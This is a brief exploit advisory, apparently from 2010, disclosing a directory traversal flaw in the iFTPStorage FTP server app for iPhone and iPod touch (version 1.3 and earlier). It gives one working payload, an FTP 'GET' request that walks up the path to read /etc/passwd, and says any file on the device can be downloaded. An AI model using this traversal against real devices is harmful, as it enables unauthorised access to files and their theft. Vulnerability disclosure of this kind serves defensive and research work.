############################################# ### ### ## _x3l ## # http://gahor-krisztian.hu/xel # ## xel@gahor-krisztian.hu ## ### ### ############################################# # Exploit: iFTPStorage for iPhone / iPod touch <= 1.3 - Directory Traversal # Date: 02/12/2010 # Author: _x3l # Software Link: http://itunes.apple.com/us/app/iftpstorage/id333357690?mt=8 # Version: 1.3 # Tested on: iPhone 3GS with 4.2.1 firmware There is directory traversal vulnerability in the iFTPStorage. You can download all file from the iPhone when you connected to the ftp server. For example: GET ../../../../../../etc/passwd Thank you ;)